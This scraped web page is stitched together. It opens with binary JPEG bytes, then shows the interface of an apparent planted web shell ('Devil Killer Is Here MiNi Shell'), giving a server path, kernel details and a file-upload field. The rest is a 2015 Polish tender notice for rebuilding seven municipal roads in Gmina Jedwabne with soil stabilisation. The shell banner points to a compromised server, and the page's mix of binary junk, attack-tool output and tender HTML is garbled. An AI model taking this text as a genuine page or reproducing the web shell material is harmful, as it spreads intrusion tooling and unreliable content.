JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151008/266326-N-2015.html

<p class="kh_header"><b>Jedwabne: Przebudowa dróg gminnych na terenie Gminy Jedwabne w technologii wzmacniająco-konsolidującej z dodatkami  trwale zwiększającymi odporność gruntów na absorpcję  kapilarną wody</b><br>
<b>Numer ogłoszenia: 266326 - 2015; data zamieszczenia: 08.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Jedwabnem , ul. Mickiewicza 4, 18-420 Jedwabne, woj. podlaskie, tel. 86 217 22 19, faks 86 217 22 19.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Jedwabnem.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych na terenie Gminy Jedwabne w technologii wzmacniająco-konsolidującej z dodatkami  trwale zwiększającymi odporność gruntów na absorpcję  kapilarną wody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
Przedmiotem zamówienia jest wykonanie przebudowy siedmiu dróg gminnych kategorii KR-2 w miejscowościach:
- Kucze - Witynie o długości drogi 1,8 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
- Orlikowo o długości drogi 1,7 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
- Rostki o długości drogi 0,53 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
- Chyliny - Kąty o długości drogi 0,85 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
- Kaimy - Korytki o długości drogi 1,4 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
- Kotowo Plac o długości drogi 0,13 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
- Grądy Małe o długości drogi 0,4 km, szer. 5,0 m z obustronnymi poboczami szer. 0,50 m,
na terenie Gminy Jedwabne poprzez wykorzystanie materiału miejscowego, który dostępny jest na miejscu budowy (istniejącego gruntu lub mieszanki gruntowej uzyskanej w wyniku wykorzystywania istniejącego podłoża i uzupełniania brakujących frakcji - tzw. doziarnienia) i zastosowanie dla tego materiału stabilizacji dodatkami trwale zwiększającymi odporność na absorpcję kapilarną wody.
Roboty wykonać na podstawie Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych (STWiORB), która stanowi załącznik do niniejszej SIWZ oraz wytycznych SIWZ.
Zamierzeniem Zamawiającego jest ograniczenie do niezbędnego minimum przewożenia mas ziemnych poprzez ponowne wykorzystanie w całości istniejącej, zdegradowanej podbudowy drogowej (ewentualnie z udziałem występującego materiału gruntowego zależne od wymagań zastosowanych dodatków do wykonania nowej podbudowy drogowej, pełniącej funkcję zarówno warstwy ulepszonego podłoża, jak i warstwy podbudowy zasadniczej bezpośrednio pod warstwę ścieralną (ochronną) z kruszywa.
Wymaganym efektem, jaki wywołać mają dodatki zastosowane przez wykonawcę ma być trwałe zredukowanie zdolności materiału przeznaczonego do wykonania drogi do podciągania kapilarnego wody.
Dla każdej drogi wymagane jest uzupełnienie brakującej frakcji drobnej poprzez doziarnienie gruntem o zawartości frakcji 0,075 mm. Ilość gruntu uzależniona jest od jego rodzaju - rozkładu uziarnienia - i należy dobrać ją laboratoryjnie po identyfikacji miejsca poboru gruntu doziarniającego. Zaleca się doziarnienie w ilości 30 procent materiałem o zawartości frakcji 0,075 mm mieszczącej się w przedziale od 40 do 50 procent dokładne wytyczne w tym zakresie muszą być jednakże przedmiotem właściwych badań labortoryjnych. Humus należy wymienić na grunt spoisty, spełniający wymagania.
Wykonanie przebudowy drogi wyłącznie poprzez zwiększenie sztywności warstwy podbudowy, bez trwałego zwiększenia jej odporność na absorpcję kapilarną wody tj. bez zatrzymania procesów podciągania kapilarnego wody w głąb warstwy podbudowy stanowi ofertę wariantową. Zamawiający nie dopuszcza składania ofert wariantowych i będą one odrzucane.
Nie dopuszcza się stabilizacji materiału gruntowego przebudowywanej drogi cementem, mieszankami wodno - asfaltowymi (emulsje), wapnem czy też asfaltem spienionym.
2. Opis wykonania przebudowy dróg w technologii - stabilizacji dodatkami trwale zwiększającymi odporność na absorbcję kapilarną wody.
Technologia:
Przebudowa istniejących dróg polegać będzie na trwałym zwiększeniu odporności na absorpcję kapilarną wody wykorzystywanego do budowy i występującego lokalnie materiału oraz podniesieniu jego sztywności (do poziomu zapewniającego spełnienie wymagań zapisanych w STWiORB) poprzez dodanie, a następnie wymieszania na głębokość 35 cm odpowiednich dodatków chemicznych.
Wymagany przez Zamawiającego poziom zmian w zakresie trwałego wzrostu odporności na absorbcję kapilarną wody wynosi:
- współczynnik nasiąkania (S) - maksymalnie 0,6 (kg:m2 h 0,5)
- współczynnik odporności na absorbcje kapilarną (R) - minimalnie 70 (h:m2)
Planowane do wykorzystania przez wykonawcę dodatki muszą posiadać odpowiednią Aprobatę Techniczną z treści której jednoznacznie będzie wynikać potwierdzenie, że dodatki, oddziaływają na grunt w taki sposób, że trwale zwiększają jego odporność na absorpcję kapilarną wody.
Dodatkowo aprobata techniczna musi posiadać zdefiniowaną procedurę pomiaru współczynników S i R oraz pozostałe zapisy szczegółowo zdefiniowane w pkt 2 STWiORB
Na potwierdzenie wymaganego sposobu wykonania zamówienia Zamawiający wymaga złożenia przez wykonawcę w ofercie ważnej aprobaty technicznej wydanej przez stosowny Instytut dla przewidzianych do zastosowania przez Wykonawcę dodatków.
Przyjęte przez wykonawcę dodatki muszą posiadać atest PZH i inne profesjonalne badania zapewniające, iż rozwiązanie jest przyjazne i bezpieczne dla środowiska.
Wykończenie:
Polega na wyprofilowaniu i zagęszczeniu do odpowiedniego, wymaganego w STWiORB poziomu nowo powstałej podbudowy drogowej. Na tak wykonanej podbudowie należy dodatkowo wykonać min 5 cm warstwy uszorstniającej z mieszanki niezwiązanej o frakcji 0-22,5 mm.
Droga, której trasa przebiegać będzie w wykopie lub terenie równinnym musi posiadać odwodnienie w postaci rowów przydrożnych w formie otwartej kanalizacji deszczowej. Rowy nie uszczelnione, naturalne, trawiaste z odprowadzeniem wody deszczowej poza koronę drogi. Rowy odwadniające otwarte zalicza się do otwartego systemu kanalizacji deszczowej i budowa ich nie wymaga uzyskania pozwolenia wodnoprawnego.
Podstawowe parametry techniczne drogi:
- kategoria obciążenia ruchem KR-2
- droga jednojezdniowa dwukierunkowa klasy D
- szerokość jezdni - 5,0 m
- prędkość projektowa - 30 km na h
- prędkość dopuszczalna - 40 km na h
- spadek poprzeczny jednostronny jezdni i równa się 2 procent
- pobocza szerokości z kruszywa łamanego - 0,5m
- spadek poprzeczny poboczy i zieleńców i równa się 8 procent
- promienie łuków najazdowych zjazdów R równa się 5mk - 15m
- profilowanie i zagęszczanie podłoża,
- istniejąca nawierzchnia zjazdów zostanie wyrównana kruszywem łamanym.
Szczegóły wykonania zawiera STWiORB, która jest załącznikiem do niniejszej SIWZ
W niniejszym postępowaniu pod pojęciem OBIEKT należy rozumieć całość prac przewidzianych do wykonania w przedmiotowym postępowaniu.
3. Rozwiązania równoważne.
- Jeżeli w dokumentach opisujących przedmiot zamówienia znajdują się nazwy materiałów i urządzeń lub jakichkolwiek innych wyrobów lub produktów służą one jedynie i wyłącznie określeniu pożądanego standardu wykonania i określenia właściwości i wymogów techniczno - użytkowych dla danego typu rozwiązań. Nie są one wiążące przyszłego wykonawcę do ich stosowania.
- Wykonawca może zastosować materiały i urządzenia równoważne o parametrach techniczno - użytkowych odpowiadających co najmniej parametrom materiałów i urządzeń zaproponowanych w STWiORB
- Wykonawca ma obowiązek posiadać w stosunku do materiałów i urządzeń równoważnych dokumenty potwierdzające pozwolenie na zastosowanie wbudowanie (certyfikaty B lub aprobaty techniczne i deklaracje właściwości użytkowych).
- Dopuszcza się równoważne urządzenia, materiały pod warunkiem, że zagwarantują one realizację zamówienia zgodnie z założeniami jakościowymi, technologicznymi i eksploatacyjnymi oraz zapewnią uzyskanie zgodnych z STWiORB parametrów technicznych, technologicznych i jakościowych - w szczególności uzyskanie dla materiału podbudowy współczynnika nasiąkania (S) maksymalnie 0,6 (kg na m2 x h0,5) i współczynnika odporności na absorpcję kapilarną (R) minimalnie 70 (h na m2).
- Wykonawca składający ofertę równoważną będzie zobowiązany do udowodnienia Zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do opisanych w SIWZ i STWiORB
- Użycie materiałów bez stwierdzenia pochodzenia i nie spełniających wymagań SIWZ i STWiORB jest niedopuszczalne. Zastosowanie przez wykonawcę materiałów, które nie będą spełniać ww. wymagań skutkować będzie bezwzględną rozbiórką i ponownym wykonaniem zamówienia na koszt wykonawcy, z wszelkimi dodatkowymi skutkami z tego wynikającymi. Zamawiającemu przysługiwać będzie prawo rozwiązania umowy z wyłącznej winy wykonawcy ze skutkami wynikającymi z warunków umowy.
4. Warunki gwarancji i rękojmi.
- Zamawiający wymaga od wykonawcy, że odpowiedzialność za wady przedmiotu zamówienia zostanie rozszerzona poprzez udzielenie pisemnej gwarancji.
- Wykonawca udzieli Zamawiającemu gwarancji na wykonany przedmiot zamówienia i wbudowane materiały oraz zamontowane urządzenia przez okres co najmniej 36 miesięcy licząc od dnia dokonania odbioru końcowego.
- Uprawnienia Zamawiającego z tytułu rękojmi za wady wygasają po upływie 36 miesięcy licząc od dnia dokonania odbioru końcowego.
- Szczegółowe zasady wykonywania warunków gwarancji i rękojmi zawarto we wzorze umowy oraz wzorze karty gwarancyjnej stanowiącej załącznik do wzoru umowy.
5. Wykonanie przedmiotu zamówienia.
- Roboty budowlane objęte zamówieniem należy wykonać na podstawie wytycznych niniejszej SIWZ, STWiORB z należytą starannością oraz z wiedzą techniczną, przepisami BHP, ppoż oraz poleceniami Nadzoru Inwestorskiego.
- Wykonanie robót będzie się uważać za zakończone - odbiór końcowy, jeżeli odbiór nastąpi bez wad istotnych, obiekt będzie spełniał wymagania STWiORB.
- Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie wbudowanie (certyfikaty B i lub aprobaty techniczne niezależnego podmiotu uprawnionego do ich sporządzania oraz deklaracje właściwości użytkowych).
- Zabrania się stosowania materiałów nieodpowiadających wymaganiom obowiązujących Norm oraz o innych parametrach niż określone w załącznikach do niniejszej SIWZ.
- Wykonawca zabezpieczy składowane tymczasowo na placu budowy materiały i urządzenia - do czasu ich wbudowania, przed zniszczeniem, uszkodzeniem albo utratą jakości, właściwości lub parametrów oraz udostępni do kontroli przez Nadzór Inwestorski.
- Wykonawca po zakończeniu robót przekaże Zamawiającemu w formie papierowej trwale spiętej oraz na nośniku cyfrowym operat kolaudacyjny, w skład którego wchodzić będą:
- protokoły przekazania terenu budowy,
- oświadczenie kierownika budowy o rozpoczęciu i o zakończeniu robót oraz gotowości do odbioru,
- certyfikaty B i lub aprobaty techniczne niezależnego podmiotu uprawnionego do ich sporządzania oraz deklaracje właściwości użytkowych na wbudowane materiały i zamontowane urządzenia,
- dokumentacja powykonawcza, rysunki i opisy (inne niż dokumentacja projektowa), służące realizacji robót,
- kopia mapy zasadniczej powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej,
- karta gwarancyjna obejmująca odpowiedzialność gwarancyjną za wykonane roboty i zamontowane urządzenia,
- protokoły z badań (badania przed rozpoczęciem robót oraz w trakcie ich prowadzenia) - w szczególności współczynników S i R, prób i inspekcji zgodnie z Rozdziałem 6 STWiORB
- protokoły odbioru robót,
- protokoły z narad i ustaleń,
- inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia, a odnoszące się do jego realizacji,
Wykonawca wykona dwa komplety (kopia i oryginał) wymienionego operatu. Dokumentacja powykonawcza podlega akceptacji przez Zamawiającego.
- Wykonawca, jako wytwórca odpadów, jest odpowiedzialny za odzysk lub unieszkodliwienie wszelkich odpadów powstałych w trakcie realizacji robót stanowiących przedmiot zamówienia oraz do wskazania miejsca i procesu zastosowanego odzysku lub unieszkodliwienia tych odpadów.
- Po stronie Wykonawcy leży poniesienie wszelkich kosztów niezbędnych do należytego wykonania przedmiotu zamówienia. W kosztach ogólnych należy ponadto uwzględnić:
- uregulowanie opłat i kosztów dozoru budowy i odbioru elementów przedmiotu zamówienia,
- czasowe zajęcie gruntów nie należących do Zamawiającego oraz koszty, opłaty i odszkodowania z tym związane,
- poniesienie kosztów odszkodowań za szkody wyrządzone podczas prowadzenia robót budowlanych itp.
Zaplecze Wykonawcy: urządzenie i utrzymanie zaplecza Wykonawcy, likwidacja zaplecza Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.11.12.00-0, 45.31.62.13-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków 
w tym zakresie. Zamawiający uzna ten warunek za spełniony na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie roboty budowlane (w tym jedną o zakresie stanowiącym nie mniej niż 60% zakresu/obmiaru istniejącej inwestycji tj.ok 20 000 m2) polegające na budowie, przebudowie dróg poprzez wykonanie podbudowy w technologii stabilizacji z dodatkami trwale zwiększającymi odporność gruntów na absorpcję kapilarną wody. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych i  dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami wiedzy technicznej i prawidłowo ukończone; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować:
a)	stabilizatorem gruntu - recyklerem o głębokości roboczej 0 - 50 cm i szerokości roboczej min. 2,4 m,
b)	samojezdnym walcem stalowym gładkim z wibracją o masie min. 10t oraz samojezdnym walcem na kołach pneumatycznych,
c)	równiarką,
d)	siewnikiem i polewaczką,
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia i kwalifikacje; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.:
a) kierownikiem budowy (1 osoba) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno - budowlanej bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót drogowych dla budowy będącej przedmiotem zamówienia i doświadczenie w kierowaniu budową co najmniej jednej drogi o podbudowie wykonanej w technologii hydrofobizacji,
b) technologiem ( 1 osoba ) posiadającym wiedzę i doświadczenie w przygotowywaniu składu i ilości środków stabilizujących wbudowywanych w konstrukcję drogi o podbudowie wykonanej w technologii hydrofobizacji,
c) geodetą ( 1 osoba ) posiadającym uprawnienia w zakresie: geodezyjne pomiary realizacyjne i inwentaryzacyjne, geodezyjna obsługa inwestycji oraz sporządzanie dokumentacji do celów prawnych i co najmniej 3 letnie doświadczenie zawodowe na stanowisku geodety.
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia i kwalifikacje; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową w wysokości niezbędnej do wykonania zamówienia. 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunku na zasadzie spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
